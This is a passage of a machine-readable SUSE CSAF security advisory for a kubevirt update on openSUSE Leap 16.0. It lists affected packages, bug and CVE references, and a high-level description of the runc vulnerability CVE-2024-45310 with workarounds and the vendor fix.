"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_20281-1.json"
},
{
"category": "self",
"summary": "SUSE Bug 1241772",
"url": "https://bugzilla.suse.com/1241772"
},
{
"category": "self",
"summary": "SUSE Bug 1253181",
"url": "https://bugzilla.suse.com/1253181"
},
{
"category": "self",
"summary": "SUSE Bug 1253185",
"url": "https://bugzilla.suse.com/1253185"
},
{
"category": "self",
"summary": "SUSE Bug 1253186",
"url": "https://bugzilla.suse.com/1253186"
},
{
"category": "self",
"summary": "SUSE Bug 1253189",
"url": "https://bugzilla.suse.com/1253189"
},
{
"category": "self",
"summary": "SUSE Bug 1253194",
"url": "https://bugzilla.suse.com/1253194"
},
{
"category": "self",
"summary": "SUSE Bug 1253748",
"url": "https://bugzilla.suse.com/1253748"
},
{
"category": "self",
"summary": "SUSE Bug 1257128",
"url": "https://bugzilla.suse.com/1257128"
},
{
"category": "self",
"summary": "SUSE Bug 1257422",
"url": "https://bugzilla.suse.com/1257422"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-45310 page",
"url": "https://www.suse.com/security/cve/CVE-2024-45310/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22872 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22872/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64324 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64324/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64432 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64432/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64433 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64433/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64434 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64434/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64435 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64435/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64437 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64437/"
}
],
"title": "Security update for kubevirt",
"tracking": {
"current_release_date": "2026-02-27T08:51:11Z",
"generator": {
"date": "2026-02-27T08:51:11Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:20281-1",
"initial_release_date": "2026-02-27T08:51:11Z",
"revision_history": [
{
"date": "2026-02-27T08:51:11Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-container-disk-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-manifests-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-tests-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-tests-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-api-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-controller-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-handler-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-operator-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virtctl-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"product_id": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-container-disk-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-manifests-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-tests-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-tests-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-api-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-controller-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-handler-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-operator-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64",
"product_id": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Leap 16.0",
"product": {
"name": "openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0"
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-container-disk-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-container-disk-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-tests-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-tests-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-tests-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-tests-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-api-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-api-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-controller-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-controller-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-handler-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-handler-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-operator-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-operator-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64"
},
"product_reference": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
},
"product_reference": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-45310",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-45310"
}
],
"notes": [
{
"category": "general",
"text": "runc is a CLI tool for spawning and running containers according to the OCI specification. runc 1.1.13 and earlier, as well as 1.2.0-rc2 and earlier, can be tricked into creating empty files or directories in arbitrary locations in the host filesystem by sharing a volume between two containers and exploiting a race with `os.MkdirAll`. While this could be used to create empty files, existing files would not be truncated. An attacker must have the ability to start containers using some kind of custom volume configuration. Containers using user namespaces are still affected, but the scope of places an attacker can create inodes can be significantly reduced. Sufficiently strict LSM policies (SELinux/Apparmor) can also in principle block this attack -- we suspect the industry standard SELinux policy may restrict this attack\u0027s scope but the exact scope of protection hasn\u0027t been analysed. This is exploitable using runc directly as well as through Docker and Kubernetes. The issue is fixed in runc v1.1.14 and v1.2.0-rc3.\n\nSome workarounds are available. Using user namespaces restricts this attack fairly significantly such that the attacker can only create inodes in directories that the remapped root user/group has write access to. Unless the root user is remapped to an actual\nuser on the host (such as with rootless containers that don\u0027t use `/etc/sub[ug]id`), this in practice means that an attacker would only be able to create inodes in world-writable directories. A strict enough SELinux or AppArmor policy could in principle also restrict the scope if a specific label is applied to the runc runtime, though neither the extent to which the standard existing policies block this attack nor what exact policies are needed to sufficiently restrict this attack have been thoroughly tested.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-45310",
"url": "https://www.suse.com/security/cve/CVE-2024-45310"
},
{
"category": "external",
"summary": "SUSE Bug 1230092 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1230092"
},
{
"category": "external",
"summary": "SUSE Bug 1257413 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1257413"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
